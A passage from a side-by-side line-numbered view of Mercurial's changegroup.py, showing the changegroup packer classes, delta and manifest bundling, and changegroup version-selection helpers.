530 return closechunk()
523 return closechunk()
531
524
532 def fileheader(self, fname):
525 def fileheader(self, fname):
533 return chunkheader(len(fname)) + fname
526 return chunkheader(len(fname)) + fname
534
527
535 # Extracted both for clarity and for overriding in extensions.
528 # Extracted both for clarity and for overriding in extensions.
536 def _sortgroup(self, revlog, nodelist, lookup):
529 def _sortgroup(self, revlog, nodelist, lookup):
537 """Sort nodes for change group and turn them into revnums."""
530 """Sort nodes for change group and turn them into revnums."""
538 # for generaldelta revlogs, we linearize the revs; this will both be
531 # for generaldelta revlogs, we linearize the revs; this will both be
539 # much quicker and generate a much smaller bundle
532 # much quicker and generate a much smaller bundle
540 if (revlog._generaldelta and self._reorder is None) or self._reorder:
533 if (revlog._generaldelta and self._reorder is None) or self._reorder:
541 dag = dagutil.revlogdag(revlog)
534 dag = dagutil.revlogdag(revlog)
542 return dag.linearize(set(revlog.rev(n) for n in nodelist))
535 return dag.linearize(set(revlog.rev(n) for n in nodelist))
543 else:
536 else:
544 return sorted([revlog.rev(n) for n in nodelist])
537 return sorted([revlog.rev(n) for n in nodelist])
545
538
546 def group(self, nodelist, revlog, lookup, units=None):
539 def group(self, nodelist, revlog, lookup, units=None):
547 """Calculate a delta group, yielding a sequence of changegroup chunks
540 """Calculate a delta group, yielding a sequence of changegroup chunks
548 (strings).
541 (strings).
549
542
550 Given a list of changeset revs, return a set of deltas and
543 Given a list of changeset revs, return a set of deltas and
551 metadata corresponding to nodes. The first delta is
544 metadata corresponding to nodes. The first delta is
552 first parent(nodelist[0]) -> nodelist[0], the receiver is
545 first parent(nodelist[0]) -> nodelist[0], the receiver is
553 guaranteed to have this parent as it has all history before
546 guaranteed to have this parent as it has all history before
554 these changesets. In the case firstparent is nullrev the
547 these changesets. In the case firstparent is nullrev the
555 changegroup starts with a full revision.
548 changegroup starts with a full revision.
556
549
557 If units is not None, progress detail will be generated, units specifies
550 If units is not None, progress detail will be generated, units specifies
558 the type of revlog that is touched (changelog, manifest, etc.).
551 the type of revlog that is touched (changelog, manifest, etc.).
559 """
552 """
560 # if we don't have any revisions touched by these changesets, bail
553 # if we don't have any revisions touched by these changesets, bail
561 if len(nodelist) == 0:
554 if len(nodelist) == 0:
562 yield self.close()
555 yield self.close()
563 return
556 return
564
557
565 revs = self._sortgroup(revlog, nodelist, lookup)
558 revs = self._sortgroup(revlog, nodelist, lookup)
566
559
567 # add the parent of the first rev
560 # add the parent of the first rev
568 p = revlog.parentrevs(revs[0])[0]
561 p = revlog.parentrevs(revs[0])[0]
569 revs.insert(0, p)
562 revs.insert(0, p)
570
563
571 # build deltas
564 # build deltas
572 total = len(revs) - 1
565 total = len(revs) - 1
573 msgbundling = _('bundling')
566 msgbundling = _('bundling')
574 for r in xrange(len(revs) - 1):
567 for r in xrange(len(revs) - 1):
575 if units is not None:
568 if units is not None:
576 self._progress(msgbundling, r + 1, unit=units, total=total)
569 self._progress(msgbundling, r + 1, unit=units, total=total)
577 prev, curr = revs[r], revs[r + 1]
570 prev, curr = revs[r], revs[r + 1]
578 linknode = lookup(revlog.node(curr))
571 linknode = lookup(revlog.node(curr))
579 for c in self.revchunk(revlog, curr, prev, linknode):
572 for c in self.revchunk(revlog, curr, prev, linknode):
580 yield c
573 yield c
581
574
582 if units is not None:
575 if units is not None:
583 self._progress(msgbundling, None)
576 self._progress(msgbundling, None)
584 yield self.close()
577 yield self.close()
585
578
586 # filter any nodes that claim to be part of the known set
579 # filter any nodes that claim to be part of the known set
587 def prune(self, revlog, missing, commonrevs):
580 def prune(self, revlog, missing, commonrevs):
588 rr, rl = revlog.rev, revlog.linkrev
581 rr, rl = revlog.rev, revlog.linkrev
589 return [n for n in missing if rl(rr(n)) not in commonrevs]
582 return [n for n in missing if rl(rr(n)) not in commonrevs]
590
583
591 def _packmanifests(self, dir, mfnodes, lookuplinknode):
584 def _packmanifests(self, dir, mfnodes, lookuplinknode):
592 """Pack flat manifests into a changegroup stream."""
585 """Pack flat manifests into a changegroup stream."""
593 assert not dir
586 assert not dir
594 for chunk in self.group(mfnodes, self._repo.manifestlog._revlog,
587 for chunk in self.group(mfnodes, self._repo.manifestlog._revlog,
595 lookuplinknode, units=_('manifests')):
588 lookuplinknode, units=_('manifests')):
596 yield chunk
589 yield chunk
597
590
598 def _manifestsdone(self):
591 def _manifestsdone(self):
599 return ''
592 return ''
600
593
601 def generate(self, commonrevs, clnodes, fastpathlinkrev, source):
594 def generate(self, commonrevs, clnodes, fastpathlinkrev, source):
602 '''yield a sequence of changegroup chunks (strings)'''
595 '''yield a sequence of changegroup chunks (strings)'''
603 repo = self._repo
596 repo = self._repo
604 cl = repo.changelog
597 cl = repo.changelog
605
598
606 clrevorder = {}
599 clrevorder = {}
607 mfs = {} # needed manifests
600 mfs = {} # needed manifests
608 fnodes = {} # needed file nodes
601 fnodes = {} # needed file nodes
609 changedfiles = set()
602 changedfiles = set()
610
603
611 # Callback for the changelog, used to collect changed files and manifest
604 # Callback for the changelog, used to collect changed files and manifest
612 # nodes.
605 # nodes.
613 # Returns the linkrev node (identity in the changelog case).
606 # Returns the linkrev node (identity in the changelog case).
614 def lookupcl(x):
607 def lookupcl(x):
615 c = cl.read(x)
608 c = cl.read(x)
616 clrevorder[x] = len(clrevorder)
609 clrevorder[x] = len(clrevorder)
617 n = c[0]
610 n = c[0]
618 # record the first changeset introducing this manifest version
611 # record the first changeset introducing this manifest version
619 mfs.setdefault(n, x)
612 mfs.setdefault(n, x)
620 # Record a complete list of potentially-changed files in
613 # Record a complete list of potentially-changed files in
621 # this manifest.
614 # this manifest.
622 changedfiles.update(c[3])
615 changedfiles.update(c[3])
623 return x
616 return x
624
617
625 self._verbosenote(_('uncompressed size of bundle content:\n'))
618 self._verbosenote(_('uncompressed size of bundle content:\n'))
626 size = 0
619 size = 0
627 for chunk in self.group(clnodes, cl, lookupcl, units=_('changesets')):
620 for chunk in self.group(clnodes, cl, lookupcl, units=_('changesets')):
628 size += len(chunk)
621 size += len(chunk)
629 yield chunk
622 yield chunk
630 self._verbosenote(_('%8.i (changelog)\n') % size)
623 self._verbosenote(_('%8.i (changelog)\n') % size)
631
624
632 # We need to make sure that the linkrev in the changegroup refers to
625 # We need to make sure that the linkrev in the changegroup refers to
633 # the first changeset that introduced the manifest or file revision.
626 # the first changeset that introduced the manifest or file revision.
634 # The fastpath is usually safer than the slowpath, because the filelogs
627 # The fastpath is usually safer than the slowpath, because the filelogs
635 # are walked in revlog order.
628 # are walked in revlog order.
636 #
629 #
637 # When taking the slowpath with reorder=None and the manifest revlog
630 # When taking the slowpath with reorder=None and the manifest revlog
638 # uses generaldelta, the manifest may be walked in the "wrong" order.
631 # uses generaldelta, the manifest may be walked in the "wrong" order.
639 # Without 'clrevorder', we would get an incorrect linkrev (see fix in
632 # Without 'clrevorder', we would get an incorrect linkrev (see fix in
640 # cc0ff93d0c0c).
633 # cc0ff93d0c0c).
641 #
634 #
642 # When taking the fastpath, we are only vulnerable to reordering
635 # When taking the fastpath, we are only vulnerable to reordering
643 # of the changelog itself. The changelog never uses generaldelta, so
636 # of the changelog itself. The changelog never uses generaldelta, so
644 # it is only reordered when reorder=True. To handle this case, we
637 # it is only reordered when reorder=True. To handle this case, we
645 # simply take the slowpath, which already has the 'clrevorder' logic.
638 # simply take the slowpath, which already has the 'clrevorder' logic.
646 # This was also fixed in cc0ff93d0c0c.
639 # This was also fixed in cc0ff93d0c0c.
647 fastpathlinkrev = fastpathlinkrev and not self._reorder
640 fastpathlinkrev = fastpathlinkrev and not self._reorder
648 # Treemanifests don't work correctly with fastpathlinkrev
641 # Treemanifests don't work correctly with fastpathlinkrev
649 # either, because we don't discover which directory nodes to
642 # either, because we don't discover which directory nodes to
650 # send along with files. This could probably be fixed.
643 # send along with files. This could probably be fixed.
651 fastpathlinkrev = fastpathlinkrev and (
644 fastpathlinkrev = fastpathlinkrev and (
652 'treemanifest' not in repo.requirements)
645 'treemanifest' not in repo.requirements)
653
646
654 for chunk in self.generatemanifests(commonrevs, clrevorder,
647 for chunk in self.generatemanifests(commonrevs, clrevorder,
655 fastpathlinkrev, mfs, fnodes, source):
648 fastpathlinkrev, mfs, fnodes, source):
656 yield chunk
649 yield chunk
657 mfs.clear()
650 mfs.clear()
658 clrevs = set(cl.rev(x) for x in clnodes)
651 clrevs = set(cl.rev(x) for x in clnodes)
659
652
660 if not fastpathlinkrev:
653 if not fastpathlinkrev:
661 def linknodes(unused, fname):
654 def linknodes(unused, fname):
662 return fnodes.get(fname, {})
655 return fnodes.get(fname, {})
663 else:
656 else:
664 cln = cl.node
657 cln = cl.node
665 def linknodes(filerevlog, fname):
658 def linknodes(filerevlog, fname):
666 llr = filerevlog.linkrev
659 llr = filerevlog.linkrev
667 fln = filerevlog.node
660 fln = filerevlog.node
668 revs = ((r, llr(r)) for r in filerevlog)
661 revs = ((r, llr(r)) for r in filerevlog)
669 return dict((fln(r), cln(lr)) for r, lr in revs if lr in clrevs)
662 return dict((fln(r), cln(lr)) for r, lr in revs if lr in clrevs)
670
663
671 for chunk in self.generatefiles(changedfiles, linknodes, commonrevs,
664 for chunk in self.generatefiles(changedfiles, linknodes, commonrevs,
672 source):
665 source):
673 yield chunk
666 yield chunk
674
667
675 yield self.close()
668 yield self.close()
676
669
677 if clnodes:
670 if clnodes:
678 repo.hook('outgoing', node=hex(clnodes[0]), source=source)
671 repo.hook('outgoing', node=hex(clnodes[0]), source=source)
679
672
680 def generatemanifests(self, commonrevs, clrevorder, fastpathlinkrev, mfs,
673 def generatemanifests(self, commonrevs, clrevorder, fastpathlinkrev, mfs,
681 fnodes, source):
674 fnodes, source):
682 """Returns an iterator of changegroup chunks containing manifests.
675 """Returns an iterator of changegroup chunks containing manifests.
683
676
684 `source` is unused here, but is used by extensions like remotefilelog to
677 `source` is unused here, but is used by extensions like remotefilelog to
685 change what is sent based in pulls vs pushes, etc.
678 change what is sent based in pulls vs pushes, etc.
686 """
679 """
687 repo = self._repo
680 repo = self._repo
688 mfl = repo.manifestlog
681 mfl = repo.manifestlog
689 dirlog = mfl._revlog.dirlog
682 dirlog = mfl._revlog.dirlog
690 tmfnodes = {'': mfs}
683 tmfnodes = {'': mfs}
691
684
692 # Callback for the manifest, used to collect linkrevs for filelog
685 # Callback for the manifest, used to collect linkrevs for filelog
693 # revisions.
686 # revisions.
694 # Returns the linkrev node (collected in lookupcl).
687 # Returns the linkrev node (collected in lookupcl).
695 def makelookupmflinknode(dir, nodes):
688 def makelookupmflinknode(dir, nodes):
696 if fastpathlinkrev:
689 if fastpathlinkrev:
697 assert not dir
690 assert not dir
698 return mfs.__getitem__
691 return mfs.__getitem__
699
692
700 def lookupmflinknode(x):
693 def lookupmflinknode(x):
701 """Callback for looking up the linknode for manifests.
694 """Callback for looking up the linknode for manifests.
702
695
703 Returns the linkrev node for the specified manifest.
696 Returns the linkrev node for the specified manifest.
704
697
705 SIDE EFFECT:
698 SIDE EFFECT:
706
699
707 1) fclnodes gets populated with the list of relevant
700 1) fclnodes gets populated with the list of relevant
708 file nodes if we're not using fastpathlinkrev
701 file nodes if we're not using fastpathlinkrev
709 2) When treemanifests are in use, collects treemanifest nodes
702 2) When treemanifests are in use, collects treemanifest nodes
710 to send
703 to send
711
704
712 Note that this means manifests must be completely sent to
705 Note that this means manifests must be completely sent to
713 the client before you can trust the list of files and
706 the client before you can trust the list of files and
714 treemanifests to send.
707 treemanifests to send.
715 """
708 """
716 clnode = nodes[x]
709 clnode = nodes[x]
717 mdata = mfl.get(dir, x).readfast(shallow=True)
710 mdata = mfl.get(dir, x).readfast(shallow=True)
718 for p, n, fl in mdata.iterentries():
711 for p, n, fl in mdata.iterentries():
719 if fl == 't': # subdirectory manifest
712 if fl == 't': # subdirectory manifest
720 subdir = dir + p + '/'
713 subdir = dir + p + '/'
721 tmfclnodes = tmfnodes.setdefault(subdir, {})
714 tmfclnodes = tmfnodes.setdefault(subdir, {})
722 tmfclnode = tmfclnodes.setdefault(n, clnode)
715 tmfclnode = tmfclnodes.setdefault(n, clnode)
723 if clrevorder[clnode] < clrevorder[tmfclnode]:
716 if clrevorder[clnode] < clrevorder[tmfclnode]:
724 tmfclnodes[n] = clnode
717 tmfclnodes[n] = clnode
725 else:
718 else:
726 f = dir + p
719 f = dir + p
727 fclnodes = fnodes.setdefault(f, {})
720 fclnodes = fnodes.setdefault(f, {})
728 fclnode = fclnodes.setdefault(n, clnode)
721 fclnode = fclnodes.setdefault(n, clnode)
729 if clrevorder[clnode] < clrevorder[fclnode]:
722 if clrevorder[clnode] < clrevorder[fclnode]:
730 fclnodes[n] = clnode
723 fclnodes[n] = clnode
731 return clnode
724 return clnode
732 return lookupmflinknode
725 return lookupmflinknode
733
726
734 size = 0
727 size = 0
735 while tmfnodes:
728 while tmfnodes:
736 dir, nodes = tmfnodes.popitem()
729 dir, nodes = tmfnodes.popitem()
737 prunednodes = self.prune(dirlog(dir), nodes, commonrevs)
730 prunednodes = self.prune(dirlog(dir), nodes, commonrevs)
738 if not dir or prunednodes:
731 if not dir or prunednodes:
739 for x in self._packmanifests(dir, prunednodes,
732 for x in self._packmanifests(dir, prunednodes,
740 makelookupmflinknode(dir, nodes)):
733 makelookupmflinknode(dir, nodes)):
741 size += len(x)
734 size += len(x)
742 yield x
735 yield x
743 self._verbosenote(_('%8.i (manifests)\n') % size)
736 self._verbosenote(_('%8.i (manifests)\n') % size)
744 yield self._manifestsdone()
737 yield self._manifestsdone()
745
738
746 # The 'source' parameter is useful for extensions
739 # The 'source' parameter is useful for extensions
747 def generatefiles(self, changedfiles, linknodes, commonrevs, source):
740 def generatefiles(self, changedfiles, linknodes, commonrevs, source):
748 repo = self._repo
741 repo = self._repo
749 progress = self._progress
742 progress = self._progress
750 msgbundling = _('bundling')
743 msgbundling = _('bundling')
751
744
752 total = len(changedfiles)
745 total = len(changedfiles)
753 # for progress output
746 # for progress output
754 msgfiles = _('files')
747 msgfiles = _('files')
755 for i, fname in enumerate(sorted(changedfiles)):
748 for i, fname in enumerate(sorted(changedfiles)):
756 filerevlog = repo.file(fname)
749 filerevlog = repo.file(fname)
757 if not filerevlog:
750 if not filerevlog:
758 raise error.Abort(_("empty or missing revlog for %s") % fname)
751 raise error.Abort(_("empty or missing revlog for %s") % fname)
759
752
760 linkrevnodes = linknodes(filerevlog, fname)
753 linkrevnodes = linknodes(filerevlog, fname)
761 # Lookup for filenodes, we collected the linkrev nodes above in the
754 # Lookup for filenodes, we collected the linkrev nodes above in the
762 # fastpath case and with lookupmf in the slowpath case.
755 # fastpath case and with lookupmf in the slowpath case.
763 def lookupfilelog(x):
756 def lookupfilelog(x):
764 return linkrevnodes[x]
757 return linkrevnodes[x]
765
758
766 filenodes = self.prune(filerevlog, linkrevnodes, commonrevs)
759 filenodes = self.prune(filerevlog, linkrevnodes, commonrevs)
767 if filenodes:
760 if filenodes:
768 progress(msgbundling, i + 1, item=fname, unit=msgfiles,
761 progress(msgbundling, i + 1, item=fname, unit=msgfiles,
769 total=total)
762 total=total)
770 h = self.fileheader(fname)
763 h = self.fileheader(fname)
771 size = len(h)
764 size = len(h)
772 yield h
765 yield h
773 for chunk in self.group(filenodes, filerevlog, lookupfilelog):
766 for chunk in self.group(filenodes, filerevlog, lookupfilelog):
774 size += len(chunk)
767 size += len(chunk)
775 yield chunk
768 yield chunk
776 self._verbosenote(_('%8.i %s\n') % (size, fname))
769 self._verbosenote(_('%8.i %s\n') % (size, fname))
777 progress(msgbundling, None)
770 progress(msgbundling, None)
778
771
779 def deltaparent(self, revlog, rev, p1, p2, prev):
772 def deltaparent(self, revlog, rev, p1, p2, prev):
780 return prev
773 return prev
781
774
782 def revchunk(self, revlog, rev, prev, linknode):
775 def revchunk(self, revlog, rev, prev, linknode):
783 node = revlog.node(rev)
776 node = revlog.node(rev)
784 p1, p2 = revlog.parentrevs(rev)
777 p1, p2 = revlog.parentrevs(rev)
785 base = self.deltaparent(revlog, rev, p1, p2, prev)
778 base = self.deltaparent(revlog, rev, p1, p2, prev)
786
779
787 prefix = ''
780 prefix = ''
788 if revlog.iscensored(base) or revlog.iscensored(rev):
781 if revlog.iscensored(base) or revlog.iscensored(rev):
789 try:
782 try:
790 delta = revlog.revision(node, raw=True)
783 delta = revlog.revision(node, raw=True)
791 except error.CensoredNodeError as e:
784 except error.CensoredNodeError as e:
792 delta = e.tombstone
785 delta = e.tombstone
793 if base == nullrev:
786 if base == nullrev:
794 prefix = mdiff.trivialdiffheader(len(delta))
787 prefix = mdiff.trivialdiffheader(len(delta))
795 else:
788 else:
796 baselen = revlog.rawsize(base)
789 baselen = revlog.rawsize(base)
797 prefix = mdiff.replacediffheader(baselen, len(delta))
790 prefix = mdiff.replacediffheader(baselen, len(delta))
798 elif base == nullrev:
791 elif base == nullrev:
799 delta = revlog.revision(node, raw=True)
792 delta = revlog.revision(node, raw=True)
800 prefix = mdiff.trivialdiffheader(len(delta))
793 prefix = mdiff.trivialdiffheader(len(delta))
801 else:
794 else:
802 delta = revlog.revdiff(base, rev)
795 delta = revlog.revdiff(base, rev)
803 p1n, p2n = revlog.parents(node)
796 p1n, p2n = revlog.parents(node)
804 basenode = revlog.node(base)
797 basenode = revlog.node(base)
805 flags = revlog.flags(rev)
798 flags = revlog.flags(rev)
806 meta = self.builddeltaheader(node, p1n, p2n, basenode, linknode, flags)
799 meta = self.builddeltaheader(node, p1n, p2n, basenode, linknode, flags)
807 meta += prefix
800 meta += prefix
808 l = len(meta) + len(delta)
801 l = len(meta) + len(delta)
809 yield chunkheader(l)
802 yield chunkheader(l)
810 yield meta
803 yield meta
811 yield delta
804 yield delta
812 def builddeltaheader(self, node, p1n, p2n, basenode, linknode, flags):
805 def builddeltaheader(self, node, p1n, p2n, basenode, linknode, flags):
813 # do nothing with basenode, it is implicitly the previous one in HG10
806 # do nothing with basenode, it is implicitly the previous one in HG10
814 # do nothing with flags, it is implicitly 0 for cg1 and cg2
807 # do nothing with flags, it is implicitly 0 for cg1 and cg2
815 return struct.pack(self.deltaheader, node, p1n, p2n, linknode)
808 return struct.pack(self.deltaheader, node, p1n, p2n, linknode)
816
809
817 class cg2packer(cg1packer):
810 class cg2packer(cg1packer):
818 version = '02'
811 version = '02'
819 deltaheader = _CHANGEGROUPV2_DELTA_HEADER
812 deltaheader = _CHANGEGROUPV2_DELTA_HEADER
820
813
821 def __init__(self, repo, bundlecaps=None):
814 def __init__(self, repo, bundlecaps=None):
822 super(cg2packer, self).__init__(repo, bundlecaps)
815 super(cg2packer, self).__init__(repo, bundlecaps)
823 if self._reorder is None:
816 if self._reorder is None:
824 # Since generaldelta is directly supported by cg2, reordering
817 # Since generaldelta is directly supported by cg2, reordering
825 # generally doesn't help, so we disable it by default (treating
818 # generally doesn't help, so we disable it by default (treating
826 # bundle.reorder=auto just like bundle.reorder=False).
819 # bundle.reorder=auto just like bundle.reorder=False).
827 self._reorder = False
820 self._reorder = False
828
821
829 def deltaparent(self, revlog, rev, p1, p2, prev):
822 def deltaparent(self, revlog, rev, p1, p2, prev):
830 dp = revlog.deltaparent(rev)
823 dp = revlog.deltaparent(rev)
831 if dp == nullrev and revlog.storedeltachains:
824 if dp == nullrev and revlog.storedeltachains:
832 # Avoid sending full revisions when delta parent is null. Pick prev
825 # Avoid sending full revisions when delta parent is null. Pick prev
833 # in that case. It's tempting to pick p1 in this case, as p1 will
826 # in that case. It's tempting to pick p1 in this case, as p1 will
834 # be smaller in the common case. However, computing a delta against
827 # be smaller in the common case. However, computing a delta against
835 # p1 may require resolving the raw text of p1, which could be
828 # p1 may require resolving the raw text of p1, which could be
836 # expensive. The revlog caches should have prev cached, meaning
829 # expensive. The revlog caches should have prev cached, meaning
837 # less CPU for changegroup generation. There is likely room to add
830 # less CPU for changegroup generation. There is likely room to add
838 # a flag and/or config option to control this behavior.
831 # a flag and/or config option to control this behavior.
839 return prev
832 return prev
840 elif dp == nullrev:
833 elif dp == nullrev:
841 # revlog is configured to use full snapshot for a reason,
834 # revlog is configured to use full snapshot for a reason,
842 # stick to full snapshot.
835 # stick to full snapshot.
843 return nullrev
836 return nullrev
844 elif dp not in (p1, p2, prev):
837 elif dp not in (p1, p2, prev):
845 # Pick prev when we can't be sure remote has the base revision.
838 # Pick prev when we can't be sure remote has the base revision.
846 return prev
839 return prev
847 else:
840 else:
848 return dp
841 return dp
849
842
850 def builddeltaheader(self, node, p1n, p2n, basenode, linknode, flags):
843 def builddeltaheader(self, node, p1n, p2n, basenode, linknode, flags):
851 # Do nothing with flags, it is implicitly 0 in cg1 and cg2
844 # Do nothing with flags, it is implicitly 0 in cg1 and cg2
852 return struct.pack(self.deltaheader, node, p1n, p2n, basenode, linknode)
845 return struct.pack(self.deltaheader, node, p1n, p2n, basenode, linknode)
853
846
854 class cg3packer(cg2packer):
847 class cg3packer(cg2packer):
855 version = '03'
848 version = '03'
856 deltaheader = _CHANGEGROUPV3_DELTA_HEADER
849 deltaheader = _CHANGEGROUPV3_DELTA_HEADER
857
850
858 def _packmanifests(self, dir, mfnodes, lookuplinknode):
851 def _packmanifests(self, dir, mfnodes, lookuplinknode):
859 if dir:
852 if dir:
860 yield self.fileheader(dir)
853 yield self.fileheader(dir)
861
854
862 dirlog = self._repo.manifestlog._revlog.dirlog(dir)
855 dirlog = self._repo.manifestlog._revlog.dirlog(dir)
863 for chunk in self.group(mfnodes, dirlog, lookuplinknode,
856 for chunk in self.group(mfnodes, dirlog, lookuplinknode,
864 units=_('manifests')):
857 units=_('manifests')):
865 yield chunk
858 yield chunk
866
859
867 def _manifestsdone(self):
860 def _manifestsdone(self):
868 return self.close()
861 return self.close()
869
862
870 def builddeltaheader(self, node, p1n, p2n, basenode, linknode, flags):
863 def builddeltaheader(self, node, p1n, p2n, basenode, linknode, flags):
871 return struct.pack(
864 return struct.pack(
872 self.deltaheader, node, p1n, p2n, basenode, linknode, flags)
865 self.deltaheader, node, p1n, p2n, basenode, linknode, flags)
873
866
874 _packermap = {'01': (cg1packer, cg1unpacker),
867 _packermap = {'01': (cg1packer, cg1unpacker),
875 # cg2 adds support for exchanging generaldelta
868 # cg2 adds support for exchanging generaldelta
876 '02': (cg2packer, cg2unpacker),
869 '02': (cg2packer, cg2unpacker),
877 # cg3 adds support for exchanging revlog flags and treemanifests
870 # cg3 adds support for exchanging revlog flags and treemanifests
878 '03': (cg3packer, cg3unpacker),
871 '03': (cg3packer, cg3unpacker),
879 }
872 }
880
873
881 def allsupportedversions(repo):
874 def allsupportedversions(repo):
882 versions = set(_packermap.keys())
875 versions = set(_packermap.keys())
883 if not (repo.ui.configbool('experimental', 'changegroup3') or
876 if not (repo.ui.configbool('experimental', 'changegroup3') or
884 repo.ui.configbool('experimental', 'treemanifest') or
877 repo.ui.configbool('experimental', 'treemanifest') or
885 'treemanifest' in repo.requirements):
878 'treemanifest' in repo.requirements):
886 versions.discard('03')
879 versions.discard('03')
887 return versions
880 return versions
888
881
889 # Changegroup versions that can be applied to the repo
882 # Changegroup versions that can be applied to the repo
890 def supportedincomingversions(repo):
883 def supportedincomingversions(repo):
891 return allsupportedversions(repo)
884 return allsupportedversions(repo)
892
885
893 # Changegroup versions that can be created from the repo
886 # Changegroup versions that can be created from the repo
894 def supportedoutgoingversions(repo):
887 def supportedoutgoingversions(repo):
895 versions = allsupportedversions(repo)
888 versions = allsupportedversions(repo)
896 if 'treemanifest' in repo.requirements:
889 if 'treemanifest' in repo.requirements:
897 # Versions 01 and 02 support only flat manifests and it's just too
890 # Versions 01 and 02 support only flat manifests and it's just too
898 # expensive to convert between the flat manifest and tree manifest on
891 # expensive to convert between the flat manifest and tree manifest on
899 # the fly. Since tree manifests are hashed differently, all of history
892 # the fly. Since tree manifests are hashed differently, all of history
900 # would have to be converted. Instead, we simply don't even pretend to
893 # would have to be converted. Instead, we simply don't even pretend to
901 # support versions 01 and 02.
894 # support versions 01 and 02.
902 versions.discard('01')
895 versions.discard('01')
903 versions.discard('02')
896 versions.discard('02')
904 return versions
897 return versions
905
898
906 def localversion(repo):
899 def localversion(repo):
907 # Finds the best version to use for bundles that are meant to be used
900 # Finds the best version to use for bundles that are meant to be used
908 # locally, such as those from strip and shelve, and temporary bundles.
901 # locally, such as those from strip and shelve, and temporary bundles.
909 return max(supportedoutgoingversions(repo))
902 return max(supportedoutgoingversions(repo))
910
903
911 def safeversion(repo):
904 def safeversion(repo):
912 # Finds the smallest version that it's safe to assume clients of the repo
905 # Finds the smallest version that it's safe to assume clients of the repo
913 # will support. For example, all hg versions that support generaldelta also
906 # will support. For example, all hg versions that support generaldelta also
914 # support changegroup 02.
907 # support changegroup 02.
915 versions = supportedoutgoingversions(repo)
908 versions = supportedoutgoingversions(repo)
916 if 'generaldelta' in repo.requirements:
909 if 'generaldelta' in repo.requirements:
917 versions.discard('01')
910 versions.discard('01')
918 assert versions
911 assert versions
919 return min(versions)
912 return min(versions)
920
913
921 def getbundler(version, repo, bundlecaps=None):
914 def getbundler(version, repo, bundlecaps=None):
922 assert version in supportedoutgoingversions(repo)
915 assert version in supportedoutgoingversions(repo)
923 return _packermap[version][0](repo, bundlecaps)
916 return _packermap[version][0](repo, bundlecaps)
924
917
925 def getunbundler(version, fh, alg, extras=None):
918 def getunbundler(version, fh, alg, extras=None):
926 return _packermap[version][1](fh, alg, extras=extras)
919 return _packermap[version][1](fh, alg, extras=extras)
927
920
928 def _changegroupinfo(repo, nodes, source):
921 def _changegroupinfo(repo, nodes, source):
929 if repo.ui.verbose or source == 'bundle':
922 if repo.ui.verbose or source == 'bundle':
930 repo.ui.status(_("%d changesets found\n") % len(nodes))
923 repo.ui.status(_("%d changesets found\n") % len(nodes))
931 if repo.ui.debugflag:
924 if repo.ui.debugflag:
932 repo.ui.debug("list of changesets:\n")
925 repo.ui.debug("list of changesets:\n")
933 for node in nodes:
926 for node in nodes:
934 repo.ui.debug("%s\n" % hex(node))
927 repo.ui.debug("%s\n" % hex(node))
935
928
936 def makechangegroup(repo, outgoing, version, source, fastpath=False,
929 def makechangegroup(repo, outgoing, version, source, fastpath=False,
937 bundlecaps=None):
930 bundlecaps=None):
938 cgstream = makestream(repo, outgoing, version, source,
931 cgstream = makestream(repo, outgoing, version, source,
939 fastpath=fastpath, bundlecaps=bundlecaps)
932 fastpath=fastpath, bundlecaps=bundlecaps)
940 return getunbundler(version, util.chunkbuffer(cgstream), None,
933 return getunbundler(version, util.chunkbuffer(cgstream), None,
941 {'clcount': len(outgoing.missing) })
934 {'clcount': len(outgoing.missing) })
942
935
943 def makestream(repo, outgoing, version, source, fastpath=False,
936 def makestream(repo, outgoing, version, source, fastpath=False,
944 bundlecaps=None):
937 bundlecaps=None):
945 bundler = getbundler(version, repo, bundlecaps=bundlecaps)
938 bundler = getbundler(version, repo, bundlecaps=bundlecaps)
946
939
947 repo = repo.unfiltered()
940 repo = repo.unfiltered()
948 commonrevs = outgoing.common
941 commonrevs = outgoing.common
949 csets = outgoing.missing
942 csets = outgoing.missing
950 heads = outgoing.missingheads
943 heads = outgoing.missingheads
951 # We go through the fast path if we get told to, or if all (unfiltered
944 # We go through the fast path if we get told to, or if all (unfiltered
952 # heads have been requested (since we then know there all linkrevs will
945 # heads have been requested (since we then know there all linkrevs will
953 # be pulled by the client).
946 # be pulled by the client).
954 heads.sort()
947 heads.sort()
955 fastpathlinkrev = fastpath or (
948 fastpathlinkrev = fastpath or (
956 repo.filtername is None and heads == sorted(repo.heads()))
949 repo.filtername is None and heads == sorted(repo.heads()))
957
950
958 repo.hook('preoutgoing', throw=True, source=source)
951 repo.hook('preoutgoing', throw=True, source=source)
959 _changegroupinfo(repo, csets, source)
952 _changegroupinfo(repo, csets, source)
960 return bundler.generate(commonrevs, csets, fastpathlinkrev, source)
953 return bundler.generate(commonrevs, csets, fastpathlinkrev, source)
961
954
962 def _addchangegroupfiles(repo, source, revmap, trp, expectedfiles, needfiles):
955 def _addchangegroupfiles(repo, source, revmap, trp, expectedfiles, needfiles):
963 revisions = 0
956 revisions = 0
964 files = 0
957 files = 0
965 for chunkdata in iter(source.filelogheader, {}):
958 for chunkdata in iter(source.filelogheader, {}):
966 files += 1
959 files += 1
967 f = chunkdata["filename"]
960 f = chunkdata["filename"]
968 repo.ui.debug("adding %s revisions\n" % f)
961 repo.ui.debug("adding %s revisions\n" % f)
969 repo.ui.progress(_('files'), files, unit=_('files'),
962 repo.ui.progress(_('files'), files, unit=_('files'),
970 total=expectedfiles)
963 total=expectedfiles)
971 fl = repo.file(f)
964 fl = repo.file(f)
972 o = len(fl)
965 o = len(fl)
973 try:
966 try:
974 deltas = source.deltaiter()
967 deltas = source.deltaiter()
975 if not fl.addgroup(deltas, revmap, trp):
968 if not fl.addgroup(deltas, revmap, trp):
976 raise error.Abort(_("received file revlog group is empty"))
969 raise error.Abort(_("received file revlog group is empty"))
977 except error.CensoredBaseError as e:
970 except error.CensoredBaseError as e:
978 raise error.Abort(_("received delta base is censored: %s") % e)
971 raise error.Abort(_("received delta base is censored: %s") % e)
979 revisions += len(fl) - o
972 revisions += len(fl) - o
980 if f in needfiles:
973 if f in needfiles:
981 needs = needfiles[f]
974 needs = needfiles[f]
982 for new in xrange(o, len(fl)):
975 for new in xrange(o, len(fl)):
983 n = fl.node(new)
976 n = fl.node(new)
984 if n in needs:
977 if n in needs:
985 needs.remove(n)
978 needs.remove(n)
986 else:
979 else:
987 raise error.Abort(
980 raise error.Abort(
988 _("received spurious file revlog entry"))
981 _("received spurious file revlog entry"))
989 if not needs:
982 if not needs:
990 del needfiles[f]
983 del needfiles[f]
991 repo.ui.progress(_('files'), None)
984 repo.ui.progress(_('files'), None)
992
985
993 for f, needs in needfiles.iteritems():
986 for f, needs in needfiles.iteritems():
994 fl = repo.file(f)
987 fl = repo.file(f)
